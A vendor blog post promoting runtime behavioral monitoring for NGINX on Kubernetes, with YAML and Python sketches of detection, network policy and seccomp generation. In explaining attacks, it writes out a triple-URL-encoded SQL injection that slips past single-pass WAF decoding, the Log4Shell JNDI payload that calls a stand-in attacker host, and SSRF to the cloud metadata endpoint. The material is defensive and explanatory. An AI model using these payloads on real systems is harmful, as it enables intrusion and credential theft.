What Is the Best Security for NGINX in Kubernetes? (Beyond Configuration)


Jan 15, 2026

Jonathan Kaftzan
VP Marketing

Key Insights

What is the best security for NGINX Kubernetes?

The best security combines configuration controls (TLS, headers, network policies, pod security) with runtime behavioral monitoring that detects anomalies your configuration can’t see. Configuration creates the baseline—it defines what should happen. Runtime protection catches what gets through—it shows what is happening. You need both, but most teams only have the first.

Why isn’t WAF protection enough for NGINX security?

WAFs use pattern matching against known attack signatures. Attackers use encoding, obfuscation, and novel techniques that don’t match patterns. Time-based blind injection, SSRF through legitimate-looking requests, deserialization attacks—these bypass WAFs because they don’t look like attacks at the HTTP layer. They exploit application logic, not HTTP patterns.

How does runtime protection catch what configuration misses?

Runtime protection builds behavioral baselines from observed production behavior—which processes should run, which connections should occur, which files should be accessed. When behavior deviates from that baseline, it’s flagged immediately. This catches zero-days and novel attacks that have no signatures because it detects anomalous behavior, not known patterns.

What’s the difference between siloed alerts and attack story correlation?

Siloed tools generate separate alerts—WAF logs, container security events, cloud audit trails—requiring manual correlation across dashboards. Attack story correlation links events across all layers into a single timeline. The difference is 5+ hours of investigation versus 30 minutes. Learn more about attack chain detection here.

How do you prioritize NGINX container vulnerabilities effectively?

Runtime reachability analysis identifies which CVEs affect code paths actually executed in production—not every vulnerability in your base image. Combine this with EPSS scores and KEV catalog data for exploitability context. This typically reduces actionable CVEs by 90%+.

The Kubernetes security industry has spent five years telling you to “shift left.” Scan earlier. Catch vulnerabilities in the pipeline. Harden your NGINX ingress configuration before deployment. The logic seems sound: fix problems before they reach production.

Here’s what the shift-left vendors don’t mention: you can shift left perfectly and still get breached.

We know this because we see the pattern constantly. A platform security lead at a financial services company told us last quarter: “We had every scan you can imagine. SAST, DAST, container scanning, CIS benchmarks. Our NGINX configuration was textbook. Then we got breached through a deserialization vulnerability in a backend service that our scanners rated ‘low severity.’ The attacker was in our cluster for eleven days before we noticed.”

Eleven days. With a fully hardened ingress configuration. With every pipeline scan passing.

This isn’t an anomaly. When we onboard enterprise security teams to runtime monitoring, the first week is usually uncomfortable. They discover lateral movement attempts their WAF never logged. Unusual outbound connections from NGINX pods that looked normal in access logs. Process spawning in containers that passed every scan.

The problem isn’t that shift-left controls don’t work. They do—against the attacks they were designed to stop. But here’s the fundamental gap:

Configuration defines what should happen. Only runtime monitoring shows what is actually happening.

Your TLS settings define how encryption should work. Your WAF rules define what traffic should be blocked. Your network policies define which pods should communicate. Your seccomp profiles define which syscalls should execute.

None of this tells you what is happening. And that gap—between security assumptions and security reality—is where breaches live.

This guide doesn’t just cover NGINX hardening. Every other article does that. We’ll show you:

  • Why the configuration controls you already have (and should keep) aren’t sufficient
  • What runtime behavioral detection actually looks like in practice
  • The visibility gap at the application layer that most security content ignores
  • Real attack scenarios based on patterns we observe—and what the difference looks like between teams with and without runtime visibility

But first: Baseline your current state. Run this:

kubescape scan --include-namespaces ingress-nginx

Kubescape is our open-source scanner. No signup, takes 60 seconds. When we analyze scans across thousands of clusters, most teams find gaps they didn’t know existed—pods running as root, missing network policies, RBAC permissions that accumulated over time. That’s your starting point.

The Baseline You Already Have (And Why It’s Not Enough)

You’ve already done significant work. TLS with modern cipher suites. Security headers configured per CIS benchmarks. Rate limiting on sensitive endpoints. Maybe ModSecurity with the OWASP Core Rule Set. Your cluster architecture follows best practices. Your team passed the last compliance audit.

This is necessary. You should keep doing it. But understand what it protects against: known patterns of attack that announce themselves at the front door.

Here’s what these controls can’t see:

A WAF uses pattern matching. It looks for signatures like ' OR 1=1. Attackers know this. They’ve known it for fifteen years. Double-URL encoding, time-based blind injection, polyglot payloads—the techniques to bypass signature matching are well-documented. The NGINX ingress vulnerabilities we’ve tracked over the past two years have exploited annotation parsing, not HTTP patterns.

Network policies define allowed paths. But attacks move through allowed paths. If your NGINX pod can talk to your user-service, and user-service can talk to your database, the policy allows the traffic. It doesn’t know the difference between a legitimate query and an exfiltration.
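
To make that concrete, here is a hypothetical NetworkPolicy (the `user-service` name, namespace, and port are assumptions, not from any real deployment). It allows ingress-nginx pods to reach user-service on port 8080—and a legitimate query and an exfiltration attempt both traverse that same allowed path:

```yaml
# Hypothetical policy for illustration. It permits NGINX-to-user-service
# traffic; it cannot distinguish a normal query from data exfiltration
# flowing over the same permitted connection.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-nginx-to-user-service
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: user-service
  policyTypes:
    - Ingress
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: ingress-nginx
      ports:
        - protocol: TCP
          port: 8080
```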

Pod security standards constrain what containers can do. They don’t detect what containers are doing. A container running as non-root with a read-only filesystem can still execute a memory-resident attack that never touches the filesystem.

A security architect at a healthcare company: “We spent six months hardening our NGINX ingress. CIS benchmarks, WAF rules, the works. Then we deployed runtime monitoring and discovered that one of our NGINX pods had been making outbound DNS queries to a domain registered two weeks before our deployment. Our WAF saw nothing. Our network policies allowed DNS. Our pod security was ‘restricted’ profile. We’d been compromised for months.”

Configuration is static. Attacks are dynamic. If your security strategy ends at configuration, you’ve built a castle with no guards.

What “Runtime” Actually Means (Not Marketing, Mechanics)

When vendors say “runtime security,” they usually mean one of two things: container scanning with runtime context, or actual behavioral monitoring. These are not the same.

Runtime-contextualized scanning means: we scanned your images, we see what’s running, we can tell you which CVEs are in running containers. This is useful. It’s not detection.

Behavioral runtime monitoring means: we observe what processes execute, what network connections occur, what files are accessed, what syscalls happen—at the kernel level using eBPF—and we detect when behavior deviates from established baselines.

ARMO uses the second approach. Here’s what that looks like for your NGINX pods:

We deploy sensors that hook into the Linux kernel via eBPF. No sidecars, no application changes. The sensors observe:

  • Process execution: NGINX worker processes follow predictable patterns. They spawn from the master process. They handle requests. They don’t execute /bin/sh. They don’t run curl. When something outside that pattern happens, we see it.
  • Network connections: Your NGINX pods talk to specific backend services on specific ports. We build a map of normal communication. When a connection occurs outside that map—especially outbound to an IP that’s never been contacted—we flag it.
  • File access: NGINX reads config files. It writes to access logs and error logs. It doesn’t read /etc/shadow. It doesn’t write to /tmp/exploit.sh. Filesystem activity outside normal patterns indicates tampering.
  • System calls: Every operation goes through syscalls. NGINX makes a specific set of them during normal operation. Syscalls associated with exploitation—execve for unexpected binaries, ptrace for debugging injection, socket for unexpected network activity—trigger alerts when they deviate from the baseline.

We call this behavioral fingerprint Application Profile DNA. It’s built from observed production behavior, not from guesses about what a container should do. The profile is specific to your workload, your traffic patterns, your deployment.
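
The core idea can be sketched in a few lines. This is illustrative only—ARMO’s Application Profile DNA is built at the kernel level via eBPF, not in application code—but it shows the shape of baseline-then-detect: record observed behavior during a learning window, then flag anything outside it.

```python
# Minimal sketch of behavioral baselining (illustrative, not ARMO's
# implementation): learn observed behavior, then flag deviations.
from collections import defaultdict

class BehavioralProfile:
    def __init__(self):
        self.baseline = defaultdict(set)  # event type -> observed values
        self.learning = True

    def observe(self, event_type, value):
        """During the learning window, record behavior as the baseline."""
        if self.learning:
            self.baseline[event_type].add(value)

    def is_expected(self, event_type, value):
        """After learning, anything outside the baseline is anomalous."""
        return value in self.baseline[event_type]

profile = BehavioralProfile()
# Learning window: observe normal NGINX pod behavior.
profile.observe("process", "nginx: worker process")
profile.observe("connection", ("user-service", 8080))
profile.learning = False

# Normal behavior passes; a spawned shell or novel outbound connection is flagged.
assert profile.is_expected("process", "nginx: worker process")
assert not profile.is_expected("process", "/bin/sh")
assert not profile.is_expected("connection", ("203.0.113.42", 4444))
```

Note that the baseline contains no attack signatures at all—that is why a zero-day, which has no signature, still deviates from it.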

When we ask customers what made the difference, the answer is usually the same: “We stopped getting alerts about what might be wrong and started getting alerts about what was wrong.”

The Visibility Gap: Application-Layer Attacks

Most NGINX security content stops at the ingress layer. It covers TLS, headers, rate limiting, WAF—controls that operate on HTTP requests before they reach your application.

But here’s what actually happens in production: the attacks that succeed target your applications, and they happen after traffic passes through NGINX.

Attack Patterns We Actually See

These aren’t theoretical. They’re patterns we observe when customers deploy runtime monitoring for the first time.

Encoded SQL Injection Bypassing WAF:

Your ModSecurity rules look for decoded SQL patterns. An attacker sends a triple-encoded payload. NGINX logs show a 200 response—successful request. Your WAF saw normal traffic. Your backend database saw '; DROP TABLE users; -- after decoding.
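
A short Python sketch shows why single-pass decoding misses this. A WAF that decodes the request once still sees percent-encoded noise; the backend, which effectively decodes until the value stabilizes, sees the SQL:

```python
# Illustrative: why one round of URL-decoding misses layered encoding.
from urllib.parse import quote, unquote

payload = "'; DROP TABLE users; --"
encoded = quote(quote(quote(payload)))   # triple URL-encode

# A WAF that decodes once does not see the SQL pattern.
assert "DROP TABLE" not in unquote(encoded)

# Decoding repeatedly until the value stops changing recovers the payload.
value = encoded
while unquote(value) != value:
    value = unquote(value)
assert value == payload
```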

We detect this not by pattern matching (we’d miss the same encoding tricks) but by observing the effect: the application process suddenly makes unusual database queries, or the database container shows unexpected network activity, or file access patterns change.

Server-Side Request Forgery (SSRF):

The request to NGINX is legitimate—it’s hitting a valid endpoint. The exploit happens when your application uses input to construct an internal request. The attacker reaches your cloud metadata endpoint (169.254.169.254), extracts IAM credentials, and escalates from there.

Your WAF sees a normal request. Your network policies allow internal traffic. We detect this because the application container makes a network connection to an IP that’s never in its behavioral baseline—the metadata service it’s never needed to contact before.
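
A minimal sketch of that check (the baseline IPs are placeholders, and real detection happens at the kernel, not in application code): any destination outside the learned set is anomalous, and the link-local metadata range gets extra severity.

```python
# Illustrative: flag outbound connections absent from the baseline, with
# extra severity for the cloud metadata endpoint (link-local 169.254.0.0/16).
import ipaddress

baseline_destinations = {"10.0.12.7", "10.0.14.3"}  # assumed observed backends

def classify_connection(dest_ip):
    if dest_ip in baseline_destinations:
        return "normal"
    if ipaddress.ip_address(dest_ip).is_link_local:
        return "critical: metadata service access outside baseline"
    return "anomalous: destination never seen in baseline"

assert classify_connection("10.0.12.7") == "normal"
assert classify_connection("169.254.169.254").startswith("critical")
assert classify_connection("203.0.113.42").startswith("anomalous")
```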

Deserialization and Memory Attacks:

Remember Log4Shell (CVE-2021-44228)? The payload ${jndi:ldap://attacker.com/a} didn’t look like an attack. It looked like a log message. The exploit happened when Log4j processed it, triggered an LDAP lookup, and downloaded malicious code.

No WAF signature matches that pattern until after the CVE is published and rules are updated. We detected Log4Shell exploitation in customer environments before they had time to patch—because we saw containers suddenly making outbound LDAP connections they’d never made before.

This is the fundamental advantage of behavioral detection: you don’t need to know the attack signature. You need to know what normal behavior looks like. Everything else is anomalous.

What an Incident Actually Looks Like: Two Realities

We’re going to walk through the same attack scenario twice. Once as it unfolds for a team with traditional siloed tools. Once as it unfolds for a team with runtime detection and attack story correlation.

This is based on a composite of real incidents—details changed for anonymization, but the pattern and timeline are representative.

Reality One: Siloed Tools

Tuesday, 9:47 AM:

Your SOC gets a WAF alert: “Possible SQL injection attempt blocked.” This is the 47th such alert this week. Most are false positives—security scanners, malformed requests, that one vendor integration that sends weird characters. An analyst notes it and continues monitoring. There’s nothing actionable here; the request was blocked.

Tuesday, 10:15 AM:

A container security alert fires: “Unexpected process in namespace ‘payments’.” Different dashboard, different team. The analyst who gets this alert doesn’t know about the WAF alert. They investigate. A process spawned that’s not in the expected list. Could be a cron job someone forgot to document. Could be a developer debugging something. The analyst Slacks the payments team: “Anyone running anything unusual in prod?”

Tuesday, 10:38 AM:

Cloud security alert: “Unusual API call to S3 bucket ‘customer-documents’.” Third dashboard. The analyst pulls CloudTrail logs. An IAM role that normally has read-only access made a ListObjects call on a bucket it’s never touched. The analyst starts building a timeline in a spreadsheet, trying to figure out if this is related to the earlier alerts.

Tuesday, 11:45 AM:

The analyst has correlated timestamps manually. The three events happened within an hour. They escalate to the security lead. A war room forms. Six people are now looking at four different dashboards trying to piece together what happened.

Tuesday, 2:30 PM:

After four hours of investigation, the team confirms: the “blocked” SQL injection request was actually one of many. Most were blocked. One variant got through—an encoding the WAF didn’t recognize. That successful injection extracted credentials from a database. Those credentials were used to authenticate to an internal service. That service had access to S3. Data was exfiltrated.

Attacker dwell time: at least since 9:47 AM when the first alert fired. Probably longer—that was just when they got noisy enough to trigger detection. Investigation time: 5+ hours and counting.

Wednesday:

The CISO asks for a root cause analysis. The team spends another day piecing together how the attack progressed. They still don’t know exactly what data was accessed or how long the attacker was actually present.

Reality Two: Attack Story Correlation

Tuesday, 9:47 AM:

ARMO detects an anomaly in the user-service container: an unusual network connection to an internal IP (the payments database) followed by a data pattern that doesn’t match historical queries. This triggers correlation logic.

Within 30 seconds, the platform links this to:

  • A request pattern at the NGINX ingress layer (high volume of similar requests with variations)
  • The unusual network connection in the user-service container
  • A subsequent authentication event to an internal admin API
  • An S3 API call from an IAM role that never touches that bucket

Tuesday, 9:48 AM:

A single alert fires: “Attack chain detected.” The attack story shows the full timeline with one click:

“At 9:42 AM, a series of encoded SQL injection attempts targeted the /api/users endpoint. At 9:47 AM, one variant bypassed WAF rules and reached the user-service container. The payload extracted credentials from the users table (CVE-2023-XXXXX in the mysql2 package). At 9:49 AM, these credentials authenticated to the internal-admin-api. At 9:51 AM, the compromised session accessed S3 bucket ‘customer-documents.’ Exfiltration to external IP 203.0.113.42 began at 9:52 AM.

Recommended actions: Quarantine user-service container. Rotate database credentials. Revoke IAM session ‘arn:aws:sts::…:assumed-role/…’. Block egress to 203.0.113.42.”

Tuesday, 10:15 AM:

Container quarantined. Credentials rotated. Egress blocked. Incident contained.

Total dwell time: 33 minutes. Investigation time: 27 minutes. The team isn’t correlating alerts across dashboards—they’re reading a narrative that explains exactly what happened.

The “90%” Claims: What They Actually Mean

You’ll see us say “90% reduction in CVE noise” and “90% reduction in investigation time.” Let’s unpack those.

90% Reduction in Vulnerability Noise

The average container image has 400-600 CVEs. We’ve written extensively about this problem—vulnerability scanners report everything, regardless of whether the vulnerable code path is actually executed.

Runtime reachability analysis changes this. We observe which libraries and functions are actually loaded and executed in production. A CVE in a library that’s bundled but never imported? Not reachable. A CVE that requires a specific configuration your deployment doesn’t use? Not exploitable.
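
The filtering logic reduces to a simple set intersection. The package names and CVE IDs below are placeholders, not real findings, and real prioritization also layers in EPSS and KEV data as described above:

```python
# Illustrative sketch of runtime reachability filtering: only CVEs in
# libraries actually loaded in production are treated as actionable.
image_cves = {
    "libfoo": ["CVE-2024-0001", "CVE-2024-0002"],
    "libbar": ["CVE-2024-0003"],
    "libbaz": ["CVE-2024-0004"],  # bundled in the image but never loaded
}
loaded_in_production = {"libfoo"}  # assumed: observed via runtime monitoring

reachable = [
    cve
    for lib, cves in image_cves.items()
    if lib in loaded_in_production
    for cve in cves
]
assert reachable == ["CVE-2024-0001", "CVE-2024-0002"]
```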

When we onboard customers, we typically see their “actionable CVE” count drop from hundreds to dozens. One platform team told us: “We went from 847 critical/high CVEs to 23 that were actually reachable. My team stopped treating vulnerability management as a checkbox exercise and started actually patching what mattered.”

The 90% figure isn’t marketing—it’s the median reduction we see across deployments. Your mileage depends on how many unused dependencies your images contain (usually: a lot).

90% Reduction in Investigation Time

This comes from attack story correlation. Instead of manually correlating alerts across WAF logs, container security tools, SIEM events, and cloud audit trails, you get a single timeline.

The 5-hour investigation in Reality One isn’t unusual. It’s typical for teams using siloed tools. They’re skilled, they work hard, but they’re spending most of their time on correlation rather than remediation.

The 27-minute investigation in Reality Two is also typical for teams with CADR (Cloud Application Detection and Response). They’re not faster analysts—they have a single source of truth instead of four dashboards.

Smart Remediation: Fixing Without Breaking

Here’s a problem we hear constantly: “We know we should tighten security controls, but we’re terrified of breaking production.”

Network policies are the classic example. The theory is straightforward: default-deny posture, explicit allow rules for known traffic. In practice, teams are afraid to implement this because they don’t know all the traffic patterns. What if they block something legitimate?

Same with seccomp profiles. You want to restrict syscalls, but what if you block one the application actually needs? Production goes down, and suddenly security is the enemy.

This is where runtime observation becomes operational:

  • Network policies: Instead of guessing which connections should be allowed, we observe actual traffic patterns over a baseline period. Then we generate policies based on what we’ve seen. The policy reflects reality, not assumptions. When you apply it, you know it won’t block legitimate traffic—because we’ve already seen that traffic.
  • Seccomp profiles: Instead of copying a generic profile from the internet, we build profiles from the syscalls your NGINX containers actually make. We run in “observe” mode, log every syscall, then generate a profile that allows exactly those syscalls and nothing else. You can apply it with confidence because it’s based on your specific workload.
  • Before/after visibility: You can see what the remediation will change before you apply it. “This network policy will block traffic from namespace X to namespace Y.” If that’s unexpected, investigate first. If it’s expected, apply with confidence.
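
The observe-then-generate approach for seccomp can be sketched as follows. The syscall list here is a placeholder—a real profile comes from a full observation window, and NGINX needs considerably more syscalls than these five—but the structure of the generated profile is standard OCI seccomp JSON:

```python
# Illustrative: generate a seccomp profile from observed syscalls.
# Anything not observed during the learning window is denied by default.
import json

observed_syscalls = ["accept4", "epoll_wait", "read", "write", "close"]

profile = {
    "defaultAction": "SCMP_ACT_ERRNO",       # deny everything not listed
    "architectures": ["SCMP_ARCH_X86_64"],
    "syscalls": [
        {"names": sorted(set(observed_syscalls)), "action": "SCMP_ACT_ALLOW"}
    ],
}
print(json.dumps(profile, indent=2))
```

Because the allowlist comes from observation rather than a generic template, applying it is low-risk: every syscall the workload actually made during the window is permitted.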

One platform engineer described it as: “Security changes went from ‘fingers crossed, let’s hope this doesn’t break anything’ to ‘we know exactly what this affects because we can see the traffic.'”

Getting Started

Today (5 minutes):

kubescape scan --include-namespaces ingress-nginx

See your current security posture. Find the misconfigurations you didn’t know existed. Fix the obvious gaps—pods running as root, missing network policies, RBAC permissions that accumulated over time. This is free and requires no signup.

This week:

Review your configuration controls against what Kubescape found. Implement default-deny network policies. Tighten RBAC. Apply pod security standards. Verify your ingress hardening matches NSA/CISA recommendations. These are table stakes.

This month:

Deploy ARMO runtime protection on your NGINX ingress controllers. Build behavioral baselines. Discover the anomalies your configuration-based tools are missing. Start with your most critical ingress—the one routing traffic to payment processing, customer data, or admin interfaces.

Ongoing:

Use runtime-generated policies to harden your deployment without breaking production. Let attack story correlation cut your investigation time. Stop chasing CVEs that don’t matter. Focus on the vulnerabilities attackers can actually exploit.

Next Steps

Baseline your security posture:

kubescape scan --include-namespaces ingress-nginx

60 seconds, free, no signup. See what your NGINX deployment actually looks like from a security perspective.

Add runtime visibility:

Deploy runtime protection on your critical ingress controllers. Most teams discover anomalies they had no visibility into within the first week.

See attack story correlation in action:

Schedule a demo with an environment similar to yours. We’ll show you the difference between correlating alerts across four dashboards and reading a single attack timeline.

Frequently Asked Questions

Why do teams with hardened configurations still get breached?

Because configuration defines what should happen, not what is happening. A perfectly configured WAF still passes attacks it doesn’t recognize. Perfectly configured network policies still allow traffic on permitted paths. Attacks succeed by operating in the gap between your security assumptions and runtime reality. Runtime detection closes that gap.

What’s the difference between CSPM and runtime security?

CSPM (Cloud Security Posture Management) tells you whether your configuration matches security best practices. It answers: “Is this cluster configured correctly?” Runtime security tells you whether your environment behaves as expected. It answers: “Is something wrong happening right now?” You need both. But CSPM without runtime is like having a building inspector without security guards—you know the locks are good, but you don’t know if anyone’s picking them.

How much overhead does eBPF-based monitoring add?

Our sensors typically consume 1-2.5% CPU and 1% memory. eBPF runs in the kernel, not in user space, so the overhead is minimal. No sidecars means no per-pod resource multiplication. In production deployments, teams consistently tell us they don’t notice the overhead.

Can’t we just patch all vulnerabilities instead of using runtime reachability?

You could try. The average container has 604 CVEs. Most enterprises have hundreds or thousands of containers. Patching everything means constant churn, testing overhead, and deployment delays—for vulnerabilities that may not be exploitable in your environment. Runtime reachability tells you which 5-10% of CVEs actually matter. You patch what’s dangerous. Everything else goes into a backlog that doesn’t block deploys.

What does “attack story” actually mean?

Instead of three separate alerts in three tools requiring manual correlation, you get a narrative: “SQL injection bypassed WAF → exploited CVE in mysql2 → extracted credentials → authenticated to internal API → accessed S3 bucket → attempted exfiltration.” One timeline, one explanation, specific remediation steps. We’ve written more about this approach here.

We already use EDR/XDR. Why do we need this?

Traditional EDR was built for endpoints and enterprise workloads—laptops, servers, VMs. It doesn’t understand Kubernetes constructs: namespaces, pods, deployments, service accounts. It doesn’t correlate container events with Kubernetes control plane events with cloud API calls. Cloud-native environments need security tools that understand cloud-native architecture.
